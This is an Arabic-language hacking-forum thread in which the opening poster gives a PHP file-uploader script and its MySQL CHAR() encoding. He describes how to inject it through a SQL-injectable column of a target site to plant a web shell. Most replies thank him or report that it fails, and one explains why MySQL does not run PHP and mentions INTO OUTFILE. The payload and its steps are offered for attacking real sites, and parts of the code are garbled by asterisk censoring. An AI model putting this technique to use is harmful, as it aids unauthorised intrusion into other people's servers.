التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 01-31-2012, 04:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية T-VAIROS Dz
 

 

 
إحصائية العضو







T-VAIROS Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى T-VAIROS Dz إرسال رسالة عبر Yahoo إلى T-VAIROS Dz إرسال رسالة عبر Skype إلى T-VAIROS Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
T-VAIROS Dz is on a distinguished road

................ استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


السلام عليكم ورحمة الله وبركاته ...
قبل فترة اكثر من شهر خطرت ببالي فكرة ...

هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

الطريقة كالتالي ...

ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...


كود PHP:
 <?php  
echo '<b>Upload Center</b>'
echo 
'<b><br><br>'.php_u****().'<br></b>'
echo 
'<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">'
echo 
'<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>'
if( 
$_POST***91;'_upl'***93; == "Upload" ){ if(@copy($_FILES***91;'file'***93;***91;'tmp_****'***93;, $_FILES***91;'file'***93;***91;'****'***93;)) { echo '<b>Done !!!</b><br><br>'; } 
 else { echo 
'<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>
لازم تكون هاذي اداة Hack Bar منصب على الفيرفوكس بتاعك

من هنا تضيف اداة

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

SQL > MySQL > MySQLCHAR

راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)

-----------------------------

بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..


تحياتي اخوT-VIROS Dzـــــكم


hsjyghg eyvhj SQL Inj3ti0n td hkahx lv;. vtu gvtu hgag avp>vtu>adg>sql

   

رد مع اقتباس
قديم 01-31-2012, 04:33 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية fantome195
 

 

 
إحصائية العضو








fantome195 غير متواجد حالياً

إرسال رسالة عبر MSN إلى fantome195

 

 

إحصائية الترشيح

عدد النقاط : 12
fantome195 is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


مشكور يا أخي الله ينورك

   

رد مع اقتباس
قديم 01-31-2012, 04:44 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


الفكره هاي جربناها منذ سنتين لكن فاشله ماراح تنجح

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 01-31-2012, 05:13 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية T-VAIROS Dz
 

 

 
إحصائية العضو







T-VAIROS Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى T-VAIROS Dz إرسال رسالة عبر Yahoo إلى T-VAIROS Dz إرسال رسالة عبر Skype إلى T-VAIROS Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
T-VAIROS Dz is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


هناك مشكل في مسار الشيل فقط وراح اكشف المسار اشناء الله
يا اخي Spartacus

   

رد مع اقتباس
قديم 01-31-2012, 05:36 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


تعرف كيف يعمل مركز التحميل كله مربوط بالقاعده
مستحيل انه يرفع بدون ماتكون عندك فكره عن القاعده تبعه واليوزر كمان

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 01-31-2012, 06:12 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية DZ.CRYPTE.DZ
 

 

 
إحصائية العضو







DZ.CRYPTE.DZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DZ.CRYPTE.DZ is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Spartacus
تعرف كيف يعمل مركز التحميل كله مربوط بالقاعده
مستحيل انه يرفع بدون ماتكون عندك فكره عن القاعده تبعه واليوزر كمان


التوقيع



 

   

رد مع اقتباس
قديم 01-31-2012, 10:48 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية fantome195
 

 

 
إحصائية العضو








fantome195 غير متواجد حالياً

إرسال رسالة عبر MSN إلى fantome195

 

 

إحصائية الترشيح

عدد النقاط : 12
fantome195 is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


المهم هو رفع الشيل أذا اترفع فسأبحث عن طريق برامج التجسس ع المواقع وأبسط متال ع ذلك INTELLITAMPER (به تغرة ولكنه مفيد)

   

رد مع اقتباس
قديم 02-08-2012, 09:08 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية stremsysteme
 

 

 
إحصائية العضو





stremsysteme غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
stremsysteme is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


لم تنجح معي

   

رد مع اقتباس
قديم 02-12-2012, 05:12 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو






أسدالله الدمشقي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسدالله الدمشقي is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


صحيح اخي يصير مركز لاكن ما يدعم ارفع وهذه قصة طويله تتعلق بلغة البرمجة بي اتش بي وال اتش تي ام ال والدوال الممنوعة وامور عديدة جدن

التوقيع

تقبري البي يا عمتي
http://www.facebook.com/photo.php?fb...&type=1&ref=nf
لا غالب الا الله
http://www.youtube.com/watch?v=IbwpTOajUV8

 

   

رد مع اقتباس
قديم 02-17-2012, 06:10 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية abdinho05
 

 

 
إحصائية العضو






abdinho05 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdinho05 is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


شكرا اخي
لكن لا تعمل هذه الطريقة

   

رد مع اقتباس
قديم 02-17-2012, 07:04 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

Thumbs up رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


السلام عليكم ، اعود بعد انقطاع عن المنتدى بيتنا العناكب
ههه ربما فترة بيات شتوي

بالنسبة للأخ الكريم هذه فكرة جميلة ولكن لا تنجح لسبب بسيط وسأشرحه لك هنا :
بالنسبة للحقن فإن غالبية التنفيذ تقع على برنامج Mysql او الداتابيز وربما في حالات نادرة يتحكم الكود في بعض اكواد الحقن.
طيب الحين وضعت الكود ما النتيجة ؟ المتوقعه انه يظهر في الصفحة كما هو دون اي تغيير لانه يحتاج إلى دالة eval بداخل php ليكي ينفذ ككود php ؟ يعني بي اختصار
mysql لا تنفذ كود php ولكن php تستدعي اكواد sql لتنفيذها بواسطة mysql server

رأيت هذه التجربة من قبل على ما اعتقد التنفيذ يتطلب حفظ هذا الكود باستخدام outfile بشروطها المعقدة.

ولك جزيل شركي لا تيأس ابدا فإنت في الطريق الصحيح وحاول جرب فأغب الثغرات والطرق ناتجة عن تجربة المختلف والغريب وغير الممكن ..
لك تحياتي صاحب الموضوع

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 03-15-2012, 08:41 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو






wahidhackerdz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
wahidhackerdz is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


والله انت عبقري

التوقيع

wahidhackerdz@hotmail.com

 

   

رد مع اقتباس
قديم 03-15-2012, 10:24 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Hacker16
 

 

 
إحصائية العضو







Hacker16 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Hacker16 is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


جزاك الله خيرا أخي

التوقيع

{ Dُon,T PُlaYً WٌitH ’Mٌe }


 

   

رد مع اقتباس
قديم 10-13-2013, 03:40 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية M3MY Team
 

 

 
إحصائية العضو






M3MY Team غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M3MY Team is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


مشكووووووووووور

   

رد مع اقتباس
قديم 04-06-2014, 01:23 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو






اياد الاسمر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
اياد الاسمر is on a distinguished road

افتراضي رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


مشكو ر ,~ قديمة ,~

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
شرح.رفع.شيل.sql

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:33 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0